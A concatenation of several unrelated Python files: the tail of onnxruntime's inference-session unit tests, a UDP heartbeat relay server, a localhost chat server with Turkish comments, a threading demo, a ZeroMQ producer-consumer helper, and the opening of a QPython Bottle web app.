output_expected = np.array([[5.0], [11.0], [17.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testRunModel2Contiguous(self):
sess = onnxrt.InferenceSession(get_name("matmul_1.onnx"))
x = np.array([[2.0, 1.0], [4.0, 3.0], [6.0, 5.0]], dtype=np.float32)[:, [1, 0]]
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "X")
input_shape = sess.get_inputs()[0].shape
self.assertEqual(input_shape, [3, 2])
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [3, 1])
res = sess.run([output_name], {input_name: x})
output_expected = np.array([[5.0], [11.0], [17.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
xcontiguous = np.ascontiguousarray(x)
rescontiguous = sess.run([output_name], {input_name: xcontiguous})
np.testing.assert_allclose(output_expected, rescontiguous[0], rtol=1e-05, atol=1e-08)
def testRunModelMultipleThreads(self):
available_providers = onnxrt.get_available_providers()
# Skip this test for a "pure" DML onnxruntime python wheel. We keep this test enabled for instances where both DML and CUDA
# EPs are available (Windows GPU CI pipeline has this config) - this test will pass because CUDA has higher precendence than DML
# and the nodes are assigned to only the CUDA EP (which supports this test)
if ('DmlExecutionProvider' in available_providers and not 'CUDAExecutionProvider' in available_providers):
print("Skipping testRunModelMultipleThreads as the DML EP does not support calling Run() on different threads using the same session object ")
else:
so = onnxrt.SessionOptions()
so.log_verbosity_level = 1
so.logid = "MultiThreadsTest"
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), sess_options=so)
ro1 = onnxrt.RunOptions()
ro1.logid = "thread1"
t1 = threading.Thread(target=self.run_model, args=(sess, ro1))
ro2 = onnxrt.RunOptions()
ro2.logid = "thread2"
t2 = threading.Thread(target=self.run_model, args=(sess, ro2))
t1.start()
t2.start()
t1.join()
t2.join()
def testListAsInput(self):
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = sess.get_inputs()[0].name
res = sess.run([], {input_name: x.tolist()})
output_expected = np.array([[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testStringListAsInput(self):
sess = onnxrt.InferenceSession(get_name("identity_string.onnx"))
x = np.array(['this', 'is', 'identity', 'test'], dtype=np.str).reshape((2, 2))
x_name = sess.get_inputs()[0].name
res = sess.run([], {x_name: x.tolist()})
np.testing.assert_equal(x, res[0])
def testRunDevice(self):
device = onnxrt.get_device()
self.assertTrue('CPU' in device or 'GPU' in device)
def testRunModelSymbolicInput(self):
sess = onnxrt.InferenceSession(get_name("matmul_2.onnx"))
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "X")
input_shape = sess.get_inputs()[0].shape
# Input X has an unknown dimension.
self.assertEqual(input_shape, ['None', 2])
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_shape = sess.get_outputs()[0].shape
# Output X has an unknown dimension.
self.assertEqual(output_shape, ['None', 1])
res = sess.run([output_name], {input_name: x})
output_expected = np.array([[5.0], [11.0], [17.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testBooleanInputs(self):
sess = onnxrt.InferenceSession(get_name("logicaland.onnx"))
a = np.array([[True, True], [False, False]], dtype=np.bool)
b = np.array([[True, False], [True, False]], dtype=np.bool)
# input1:0 is first in the protobuf, and input:0 is second
# and we maintain the original order.
a_name = sess.get_inputs()[0].name
self.assertEqual(a_name, "input1:0")
a_shape = sess.get_inputs()[0].shape
self.assertEqual(a_shape, [2, 2])
a_type = sess.get_inputs()[0].type
self.assertEqual(a_type, 'tensor(bool)')
b_name = sess.get_inputs()[1].name
self.assertEqual(b_name, "input:0")
b_shape = sess.get_inputs()[1].shape
self.assertEqual(b_shape, [2, 2])
b_type = sess.get_inputs()[0].type
self.assertEqual(b_type, 'tensor(bool)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(bool)')
output_expected = np.array([[True, False], [False, False]], dtype=np.bool)
res = sess.run([output_name], {a_name: a, b_name: b})
np.testing.assert_equal(output_expected, res[0])
def testStringInput1(self):
sess = onnxrt.InferenceSession(get_name("identity_string.onnx"))
x = np.array(['this', 'is', 'identity', 'test'], dtype=np.str).reshape((2, 2))
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "input:0")
x_shape = sess.get_inputs()[0].shape
self.assertEqual(x_shape, [2, 2])
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'tensor(string)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(string)')
res = sess.run([output_name], {x_name: x})
np.testing.assert_equal(x, res[0])
def testStringInput2(self):
sess = onnxrt.InferenceSession(get_name("identity_string.onnx"))
x = np.array(['Olá', '你好', '여보세요', 'hello'], dtype=np.unicode).reshape((2, 2))
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "input:0")
x_shape = sess.get_inputs()[0].shape
self.assertEqual(x_shape, [2, 2])
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'tensor(string)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(string)')
res = sess.run([output_name], {x_name: x})
np.testing.assert_equal(x, res[0])
def testInputBytes(self):
sess = onnxrt.InferenceSession(get_name("identity_string.onnx"))
x = np.array([b'this', b'is', b'identity', b'test']).reshape((2, 2))
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "input:0")
x_shape = sess.get_inputs()[0].shape
self.assertEqual(x_shape, [2, 2])
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'tensor(string)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(string)')
res = sess.run([output_name], {x_name: x})
np.testing.assert_equal(x, res[0].astype('|S8'))
def testInputObject(self):
sess = onnxrt.InferenceSession(get_name("identity_string.onnx"))
x = np.array(['this', 'is', 'identity', 'test'], object).reshape((2, 2))
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "input:0")
x_shape = sess.get_inputs()[0].shape
self.assertEqual(x_shape, [2, 2])
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'tensor(string)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(string)')
res = sess.run([output_name], {x_name: x})
np.testing.assert_equal(x, res[0])
def testInputVoid(self):
sess = onnxrt.InferenceSession(get_name("identity_string.onnx"))
x = np.array([b'this', b'is', b'identity', b'test'], np.void).reshape((2, 2))
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "input:0")
x_shape = sess.get_inputs()[0].shape
self.assertEqual(x_shape, [2, 2])
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'tensor(string)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(string)')
res = sess.run([output_name], {x_name: x})
expr = np.array([['this\x00\x00\x00\x00', 'is\x00\x00\x00\x00\x00\x00'], ['identity', 'test\x00\x00\x00\x00']],
dtype=object)
np.testing.assert_equal(expr, res[0])
def testRaiseWrongNumInputs(self):
with self.assertRaises(ValueError) as context:
sess = onnxrt.InferenceSession(get_name("logicaland.onnx"))
a = np.array([[True, True], [False, False]], dtype=np.bool)
res = sess.run([], {'input:0': a})
self.assertTrue('Model requires 2 inputs' in str(context.exception))
def testModelMeta(self):
model_path = "../models/opset8/test_squeezenet/model.onnx"
if not os.path.exists(model_path):
return
sess = onnxrt.InferenceSession(model_path)
modelmeta = sess.get_modelmeta()
self.assertEqual('onnx-caffe2', modelmeta.producer_name)
self.assertEqual('squeezenet_old', modelmeta.graph_name)
self.assertEqual('', modelmeta.domain)
self.assertEqual('', modelmeta.description)
def testProfilerWithSessionOptions(self):
so = onnxrt.SessionOptions()
so.enable_profiling = True
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), sess_options=so)
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
sess.run([], {'X': x})
profile_file = sess.end_profiling()
tags = ['pid', 'dur', 'ts', 'ph', 'X', 'name', 'args']
with open(profile_file) as f:
lines = f.readlines()
self.assertTrue('[' in lines[0])
for i in range(1, 8):
for tag in tags:
self.assertTrue(tag in lines[i])
self.assertTrue(']' in lines[8])
def testProfilerGetStartTimeNs(self):
def getSingleSessionProfilingStartTime():
so = onnxrt.SessionOptions()
so.enable_profiling = True
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), sess_options=so)
return sess.get_profiling_start_time_ns()
# Get 1st profiling's start time
start_time_1 = getSingleSessionProfilingStartTime()
# Get 2nd profiling's start time
start_time_2 = getSingleSessionProfilingStartTime()
# Get 3rd profiling's start time
start_time_3 = getSingleSessionProfilingStartTime()
# Chronological profiling's start time
self.assertTrue(start_time_1 <= start_time_2 <= start_time_3)
def testGraphOptimizationLevel(self):
opt = onnxrt.SessionOptions()
# default should be all optimizations optimization
self.assertEqual(opt.graph_optimization_level, onnxrt.GraphOptimizationLevel.ORT_ENABLE_ALL)
opt.graph_optimization_level = onnxrt.GraphOptimizationLevel.ORT_ENABLE_EXTENDED
self.assertEqual(opt.graph_optimization_level, onnxrt.GraphOptimizationLevel.ORT_ENABLE_EXTENDED)
sess = onnxrt.InferenceSession(get_name("logicaland.onnx"), sess_options=opt)
a = np.array([[True, True], [False, False]], dtype=np.bool)
b = np.array([[True, False], [True, False]], dtype=np.bool)
res = sess.run([], {'input1:0': a, 'input:0': b})
def testSequenceLength(self):
sess = onnxrt.InferenceSession(get_name("sequence_length.onnx"))
x = [
np.array([1.0, 0.0, 3.0, 44.0, 23.0, 11.0], dtype=np.float32).reshape((2, 3)),
np.array([1.0, 0.0, 3.0, 44.0, 23.0, 11.0], dtype=np.float32).reshape((2, 3))
]
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "X")
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'seq(tensor(float))')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(int64)')
output_expected = np.array(2, dtype=np.int64)
res = sess.run([output_name], {x_name: x})
self.assertEqual(output_expected, res[0])
def testSequenceConstruct(self):
sess = onnxrt.InferenceSession(get_name("sequence_construct.onnx"))
self.assertEqual(sess.get_inputs()[0].type, 'tensor(int64)')
self.assertEqual(sess.get_inputs()[1].type, 'tensor(int64)')
self.assertEqual(sess.get_inputs()[0].name, "tensor1")
self.assertEqual(sess.get_inputs()[1].name, "tensor2")
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output_sequence")
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'seq(tensor(int64))')
output_expected = [
np.array([1, 0, 3, 44, 23, 11], dtype=np.int64).reshape((2, 3)),
np.array([1, 2, 3, 4, 5, 6], dtype=np.int64).reshape((2, 3))
]
res = sess.run(
[output_name], {
"tensor1": np.array([1, 0, 3, 44, 23, 11], dtype=np.int64).reshape((2, 3)),
"tensor2": np.array([1, 2, 3, 4, 5, 6], dtype=np.int64).reshape((2, 3))
})
np.testing.assert_array_equal(output_expected, res[0])
def testSequenceInsert(self):
opt = onnxrt.SessionOptions()
opt.execution_mode = onnxrt.ExecutionMode.ORT_SEQUENTIAL
sess = onnxrt.InferenceSession(get_name("sequence_insert.onnx"), sess_options=opt)
self.assertEqual(sess.get_inputs()[0].type, 'seq(tensor(int64))')
self.assertEqual(sess.get_inputs()[1].type, 'tensor(int64)')
self.assertEqual(sess.get_inputs()[0].name, "input_seq")
self.assertEqual(sess.get_inputs()[1].name, "tensor")
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output_sequence")
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'seq(tensor(int64))')
output_expected = [np.array([1, 0, 3, 44, 23, 11], dtype=np.int64).reshape((2, 3))]
res = sess.run([output_name], {
"tensor": np.array([1, 0, 3, 44, 23, 11], dtype=np.int64).reshape((2, 3)),
"input_seq": []
})
np.testing.assert_array_equal(output_expected, res[0])
def testOrtExecutionMode(self):
opt = onnxrt.SessionOptions()
self.assertEqual(opt.execution_mode, onnxrt.ExecutionMode.ORT_SEQUENTIAL)
opt.execution_mode = onnxrt.ExecutionMode.ORT_PARALLEL
self.assertEqual(opt.execution_mode, onnxrt.ExecutionMode.ORT_PARALLEL)
def testLoadingSessionOptionsFromModel(self):
try:
os.environ['ORT_LOAD_CONFIG_FROM_MODEL'] = str(1)
sess = onnxrt.InferenceSession(get_name("model_with_valid_ort_config_json.onnx"))
session_options = sess.get_session_options()
self.assertEqual(session_options.inter_op_num_threads, 5) # from the ORT config
self.assertEqual(session_options.intra_op_num_threads, 2) # from the ORT config
self.assertEqual(session_options.execution_mode,
onnxrt.ExecutionMode.ORT_SEQUENTIAL) # default option (not from the ORT config)
self.assertEqual(session_options.graph_optimization_level,
onnxrt.GraphOptimizationLevel.ORT_ENABLE_ALL) # from the ORT config
self.assertEqual(session_options.enable_profiling, True) # from the ORT config
except Exception:
raise
finally:
# Make sure the usage of the feature is disabled after this test
os.environ['ORT_LOAD_CONFIG_FROM_MODEL'] = str(0)
def testSessionOptionsAddFreeDimensionOverrideByDenotation(self):
so = onnxrt.SessionOptions()
so.add_free_dimension_override_by_denotation("DATA_BATCH", 3)
so.add_free_dimension_override_by_denotation("DATA_CHANNEL", 5)
sess = onnxrt.InferenceSession(get_name("abs_free_dimensions.onnx"), so)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "x")
input_shape = sess.get_inputs()[0].shape
# Free dims with denotations - "DATA_BATCH" and "DATA_CHANNEL" have values assigned to them.
self.assertEqual(input_shape, [3, 5, 5])
def testSessionOptionsAddFreeDimensionOverrideByName(self):
so = onnxrt.SessionOptions()
so.add_free_dimension_override_by_name("Dim1", 4)
so.add_free_dimension_override_by_name("Dim2", 6)
sess = onnxrt.InferenceSession(get_name("abs_free_dimensions.onnx"), so)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "x")
input_shape = sess.get_inputs()[0].shape
# "Dim1" and "Dim2" have values assigned to them.
self.assertEqual(input_shape, [4, 6, 5])
def testSessionOptionsAddConfigEntry(self):
so = onnxrt.SessionOptions()
key = "CONFIG_KEY"
val = "CONFIG_VAL"
so.add_session_config_entry(key, val)
self.assertEqual(so.get_session_config_entry(key), val)
def testInvalidSessionOptionsConfigEntry(self):
so = onnxrt.SessionOptions()
invalide_key = "INVALID_KEY"
with self.assertRaises(RuntimeError) as context:
so.get_session_config_entry(invalide_key)
self.assertTrue(
'SessionOptions does not have configuration with key: ' + invalide_key in str(context.exception))
def testSessionOptionsAddInitializer(self):
# Create an initializer and add it to a SessionOptions instance
so = onnxrt.SessionOptions()
# This initializer is different from the actual initializer in the model for "W"
ortvalue_initializer = onnxrt.OrtValue.ortvalue_from_numpy(np.array([[2.0, 1.0], [4.0, 3.0], [6.0, 5.0]], dtype=np.float32))
# The user should manage the life cycle of this OrtValue and should keep it in scope
# as long as any session that is going to be reliant on it is in scope
so.add_initializer("W", ortvalue_initializer)
# Create an InferenceSession that only uses the CPU EP and validate that it uses the
# initializer provided via the SessionOptions instance (overriding the model initializer)
# We only use the CPU EP because the initializer we created is on CPU and we want the model to use that
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), so, ['CPUExecutionProvider'])
res = sess.run(["Y"], {"X": np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)})
self.assertTrue(np.array_equal(res[0], np.array([[2.0, 2.0], [12.0, 12.0], [30.0, 30.0]], dtype=np.float32)))
def testRegisterCustomOpsLibrary(self):
if sys.platform.startswith("win"):
shared_library = 'custom_op_library.dll'
if not os.path.exists(shared_library):
raise FileNotFoundError("Unable to find '{0}'".format(shared_library))
elif sys.platform.startswith("darwin"):
shared_library = 'libcustom_op_library.dylib'
if not os.path.exists(shared_library):
raise FileNotFoundError("Unable to find '{0}'".format(shared_library))
else:
shared_library = './libcustom_op_library.so'
if not os.path.exists(shared_library):
raise FileNotFoundError("Unable to find '{0}'".format(shared_library))
this = os.path.dirname(__file__)
custom_op_model = os.path.join(this, "testdata", "custom_op_library", "custom_op_test.onnx")
if not os.path.exists(custom_op_model):
raise FileNotFoundError("Unable to find '{0}'".format(custom_op_model))
so1 = onnxrt.SessionOptions()
so1.register_custom_ops_library(shared_library)
# Model loading successfully indicates that the custom op node could be resolved successfully
sess1 = onnxrt.InferenceSession(custom_op_model, so1)
#Run with input data
input_name_0 = sess1.get_inputs()[0].name
input_name_1 = sess1.get_inputs()[1].name
output_name = sess1.get_outputs()[0].name
input_0 = np.ones((3,5)).astype(np.float32)
input_1 = np.zeros((3,5)).astype(np.float32)
res = sess1.run([output_name], {input_name_0: input_0, input_name_1: input_1})
output_expected = np.ones((3,5)).astype(np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
# Create an alias of SessionOptions instance
# We will use this alias to construct another InferenceSession
so2 = so1
# Model loading successfully indicates that the custom op node could be resolved successfully
sess2 = onnxrt.InferenceSession(custom_op_model, so2)
# Create another SessionOptions instance with the same shared library referenced
so3 = onnxrt.SessionOptions()
so3.register_custom_ops_library(shared_library)
sess3 = onnxrt.InferenceSession(custom_op_model, so3)
def testOrtValue(self):
numpy_arr_input = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
numpy_arr_output = np.array([[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32)
def test_session_with_ortvalue_input(ortvalue):
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
res = sess.run(["Y"], {"X": ortvalue})
self.assertTrue(np.array_equal(res[0], numpy_arr_output))
ortvalue1 = onnxrt.OrtValue.ortvalue_from_numpy(numpy_arr_input)
self.assertEqual(ortvalue1.device_name(), "cpu")
self.assertEqual(ortvalue1.shape(), [3, 2])
self.assertEqual(ortvalue1.data_type(), "tensor(float)")
self.assertEqual(ortvalue1.is_tensor(), True)
self.assertTrue(np.array_equal(ortvalue1.numpy(), numpy_arr_input))
# Pass in the constructed OrtValue to a session via Run() and check results
test_session_with_ortvalue_input(ortvalue1)
# The constructed OrtValue should still be valid after being used in a session
self.assertTrue(np.array_equal(ortvalue1.numpy(), numpy_arr_input))
if 'CUDAExecutionProvider' in onnxrt.get_available_providers():
ortvalue2 = onnxrt.OrtValue.ortvalue_from_numpy(numpy_arr_input, 'cuda', 0)
self.assertEqual(ortvalue2.device_name(), "cuda")
self.assertEqual(ortvalue2.shape(), [3, 2])
self.assertEqual(ortvalue2.data_type(), "tensor(float)")
self.assertEqual(ortvalue2.is_tensor(), True)
self.assertTrue(np.array_equal(ortvalue2.numpy(), numpy_arr_input))
# Pass in the constructed OrtValue to a session via Run() and check results
test_session_with_ortvalue_input(ortvalue2)
# The constructed OrtValue should still be valid after being used in a session
self.assertTrue(np.array_equal(ortvalue2.numpy(), numpy_arr_input))
def testRunModelWithCudaCopyStream(self):
available_providers = onnxrt.get_available_providers()
if (not 'CUDAExecutionProvider' in available_providers):
print("Skipping testRunModelWithCudaCopyStream when CUDA is not available")
else:
# adapted from issue #4829 for a race condition when copy is not on default stream
# note:
# 1. if there are intermittent failure in this test, something is wrong
# 2. it's easier to repro on slower GPU (like M60, Geforce 1070)
# to repro #4829, uncomment the line below to run copy in a separate stream
#onnxrt.capi._pybind_state.set_do_copy_in_default_stream(False)
session = onnxrt.InferenceSession(get_name("issue4829.onnx"))
shape = np.array([2,2], dtype=np.int64)
for iteration in range(100000):
result = session.run(output_names=['output'], input_feed={'shape': shape})
if __name__ == '__main__':
unittest.main()
|
server.py
|
import socket
from threading import Thread
import time
import json
class Service:
def __init__(self, heart_addr):
self.recv_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.send_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.recv_sock.bind(heart_addr)
self.A = {}
self.B = {}
self.serve = True
self.heart_A = {}
self.heart_B = {}
self.start_time = time.time()
pass
'''
#########
维护器,用来删除掉线的节点
可以更改检测心跳时间来判断是否掉线
#########
'''
def monitor(self):
#################
while self.serve:
time.sleep(5)
for node in list(self.heart_A.keys()):
if time.time()-self.heart_A[node] > 42:
del self.heart_A[node]
del self.A[node]
for node in list(self.heart_B.keys()):
if time.time()-self.heart_B[node] > 42:
del self.heart_B[node]
del self.B[node]
pass
pass
def run(self):
t1 = Thread(target=self.service_recv)
t2 = Thread(target=self.service_send)
time.sleep(2)
t3 = Thread(target=self.monitor)
t1.start()
t2.start()
t3.start()
pass
def service_recv(self):
############
self.recv_sock.setblocking(False)
while self.serve:
try:
data, address = self.recv_sock.recvfrom(1024)
data = json.loads(data.decode('utf-8'))
except:
time.sleep(0.08)
continue
if data == 'lock':
self.A['lock'] = True
self.B['lock'] = True
continue
if data == 'unlock':
try:
del self.A['lock']
del self.B['lock']
except:
pass
continue
if data[0] == 'A':
self.A[data] = address
self.heart_A[data] = time.time()
continue
if data[0] == 'B':
self.B[data] = address
self.heart_B[data] = time.time()
continue
pass
pass
def service_send(self):
last_time = time.time()
while self.serve:
if time.time() - last_time < 5:
continue
last_time = time.time()
try:
data = json.dumps(self.B).encode('utf-8')
self.recv_sock.sendto(data, self.A['A-00'])
except Exception as e:
#print("error:", e)
pass
try:
data = json.dumps(self.A).encode('utf-8')
self.recv_sock.sendto(data, self.B['B-00'])
except Exception as e:
#print("error:", e)
pass
pass
pass
def __del__(self):
self.recv_sock.close()
self.send_sock.close()
del self.recv_sock
del self.send_sock
exit()
|
Host2.py
|
import socket #İletişim için gereken kütüphane eklendi.
import threading #Çoklu işlem için gereken kütüphane eklendi.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #Bağlantı türü ve özellikleri belirtildi.
serverRunning = True #Sunucunun çalıştığı belirtildi.
ip = "127.0.0.1" #İp local ip olarak girildi.
port = 1234 #Herhangi bir port girildi. Önemli değil.
clients = {} #Client bir sözlük olarak belirtildi.
s.bind((ip, port)) #Bağlantı açıldı.
s.listen() #Gelecek bağlantıların artık beklenmekte.
print('Server Ready...') #Anlaşılması için sunucunun hazır olduğu belirtildi.
print('Ip Address of the Server::%s'%ip) #Bağlantı için gereken ip adresi yazıldı.
def handleClient(client, uname): #Bağlantı alındığında neler yapılması gerektiği belirlendi.
clientConnected = True #Client'in bağlandığı anlaşıldı.
keys = clients.keys() #Client'ten gelen verinin anahtarları belirlendi.
help = 'There are four commands in Messenger\n1::**chatlist=>gives you the list of the people currently online\n2::**quit=>To end your session\n3::**broadcast=>To broadcast your message to each and every person currently present online\n4::Add the name of the person at the end of your message preceded by ** to send it to particular person'
#Yardım için neler gerektiği belirtildi.
while clientConnected: #Client bağlandığında yapılacaklar belirtildi.
try: #Denenmesi gerekenler açıklandı.
msg = client.recv(1024).decode('ascii') #Mesaj kısaca msg olarak belirtildi. Ayrıca 1024 kilobyte boyutunda ve ascii metin türünde alınacağı belirtildi.
response = 'Number of People Online\n' #Geri dönüt açıklandı.
found = False #Bulunma işinin henüz olmadığı belirtilir.
if '**chatlist' in msg: #Eğer gelen mesaj **chatlist ise
clientNo = 0 #Client numarası 0 olarak belilendi.
for name in keys: #Belirlenen anahtarlar arasından isimler arasında işlem yapılacağı gösterildi.
clientNo += 1 #Her bir kullanıcıda Client numarasının 1 artacağı belirlendi.
response = response + str(clientNo) +'::' + name+'\n' #Geri dönüt kullanıcı adları ve sayısının da eklenmesiyle tekrar düzenlendi.
client.send(response.encode('ascii')) #Dönüt server üzerinden kullanıcılara gönderildi.
elif '**help' in msg: #Eğer gelen mesaj **help ise
client.send(help.encode('ascii')) # Help adlı geri dönüt server üzerinden kullanıcılara gönderildi.
elif '**broadcast' in msg: #Eğer gelen mesaj **broadcast ise
msg = msg.replace('**broadcast','') #Mesaj gönderilmek üzere tekrar düzenlendi.
for k,v in clients.items(): #Gelen tüm veriler incelendi.
v.send(msg.encode('ascii')) #Mesaj tüm kullanıcılara gönderildi.
elif '**quit' in msg: #Eğer gelen mesaj **quit ise
response = 'Stopping Session and exiting...' #Dönüt tekrardan ayarlandı.
client.send(response.encode('ascii')) #Dönüt kullanıcılara server üzerinden gönderildi.
clients.pop(uname) #Client'ten kullanıcı adı silindi.
print(uname + ' has been logged out') #Ekrana kullanıcının çıktığını belirten bir dönüt gösterildi.
clientConnected = False #Client ile bağlantı kesildi.
else: #Mesaj yukarıdakilerden hiçbiri değil ise
for name in keys: #Belirlenen anahtarlar arasından isimler ile işlem yapılacağı gösterildi.
if('**'+name) in msg: #Eğer mesajda ** yanında isim de var ise
msg = msg.replace('**'+name, '') #Mesaj tekrar gönderilmek üzere düzenlendi.
clients.get(name).send(msg.encode('ascii')) #Mesaj belirtilen kişiye gönderildi.
found = True #Bulunma işinin yapıldığını belirtir.
if(not found): #Eğer bulunmadıysa
client.send('Trying to send message to invalid person.'.encode('ascii')) #Kullanıcın mesajını geçersiz birine attığı konusunda uyarı mesajı çıkartıldı.
except: #Denenecekler dışında herhangi bir durumda
clients.pop(uname) #Client'ten kullanıcı adı silindi.
print(uname + ' has been logged out') #Ekrana kullanıcının çıktığını beliten bir dönüt gösterildi.
clientConnected = False #Client ile bağlantı kesildi.
while serverRunning: #Sunucu çalıştığı sürece
client, address = s.accept() #Client ve adres doğrulandı.
uname = client.recv(1024).decode('ascii') #Kullanıcı adı alındı.
print('%s connected to the server'%str(uname)) #Bağlanan kullanıcıların ismi gösterildi.
client.send('Welcome to Messenger. Type **help to know all the commands'.encode('ascii')) #Katılan kullanıcıya giriş cümlesi gösterildi.
if(client not in clients): #Eğer client clients adındaki sözlükte değil ise
clients[uname] = client #Kullanıcı adı cliente eşitlendi.
threading.Thread(target = handleClient, args = (client, uname, )).start() #Çoklu işlem için gereken altyapı sağlandı.
|
part1.py
|
import threading
import time
def sleeper(n, name):
print(f'Process {name} would sleep.')
time.sleep(n)
print(f'Process {name} has just woken up.')
t = threading.Thread(target=sleeper, name='Thread1', args=(5, 'Thread1'))
t.start()
t.join()
print('Finish!')
|
parallel.py
|
"""Utilities for speeding things up through parallelism.
Currently including:
* A very simple PUSH-PULL reusable producer-consumer pattern
using a ZeroMQ socket instead of the (slow, unnecessarily
copying) multiprocessing.Queue. See :func:`producer_consumer`.
"""
from multiprocessing import Process
import zmq
def _producer_wrapper(f, port, addr='tcp://127.0.0.1'):
"""A shim that sets up a socket and starts the producer callable.
Parameters
----------
f : callable
Callable that takes a single argument, a handle
for a ZeroMQ PUSH socket. Must be picklable.
port : int
The port on which the socket should connect.
addr : str, optional
Address to which the socket should connect. Defaults
to localhost ('tcp://127.0.0.1').
"""
try:
context = zmq.Context()
socket = context.socket(zmq.PUSH)
socket.connect(':'.join([addr, str(port)]))
f(socket)
finally:
# Works around a Python 3.x bug.
context.destroy()
def _spawn_producer(f, port, addr='tcp://127.0.0.1'):
"""Start a process that sends results on a PUSH socket.
Parameters
----------
f : callable
Callable that takes a single argument, a handle
for a ZeroMQ PUSH socket. Must be picklable.
Returns
-------
process : multiprocessing.Process
The process handle of the created producer process.
"""
process = Process(target=_producer_wrapper, args=(f, port, addr))
process.start()
return process
def producer_consumer(producer, consumer, addr='tcp://127.0.0.1',
port=None, context=None):
"""A producer-consumer pattern.
Parameters
----------
producer : callable
Callable that takes a single argument, a handle
for a ZeroMQ PUSH socket. Must be picklable.
consumer : callable
Callable that takes a single argument, a handle
for a ZeroMQ PULL socket.
addr : str, optional
Address to which the socket should connect. Defaults
to localhost ('tcp://127.0.0.1').
port : int, optional
The port on which the consumer should listen.
context : zmq.Context, optional
The ZeroMQ Context to use. One will be created otherwise.
Returns
-------
result
Passes along whatever `consumer` returns.
Notes
-----
This sets up a PULL socket in the calling process and forks
a process that calls `producer` on a PUSH socket. When the
consumer returns, the producer process is terminated.
Wrap `consumer` or `producer` in a `functools.partial` object
in order to send additional arguments; the callables passed in
should expect only one required, positional argument, the socket
handle.
"""
context_created = False
if context is None:
context_created = True
context = zmq.Context()
try:
consumer_socket = context.socket(zmq.PULL)
if port is None:
port = consumer_socket.bind_to_random_port(addr)
try:
process = _spawn_producer(producer, port)
result = consumer(consumer_socket)
finally:
process.terminate()
return result
finally:
# Works around a Python 3.x bug.
if context_created:
context.destroy()
|
main.py
|
#-*-coding:utf8;-*-
"""
This is a sample for qpython webapp
"""
import os.path
from bottle import Bottle, ServerAdapter
from bottle import template,request,response,redirect,HTTPResponse
root = os.path.dirname(os.path.abspath(__file__))#获取当前路径
try:
import androidhelper
Droid = androidhelper.Android()
Droid.startLocating(5000,5)
except:
print("no androidhelper")
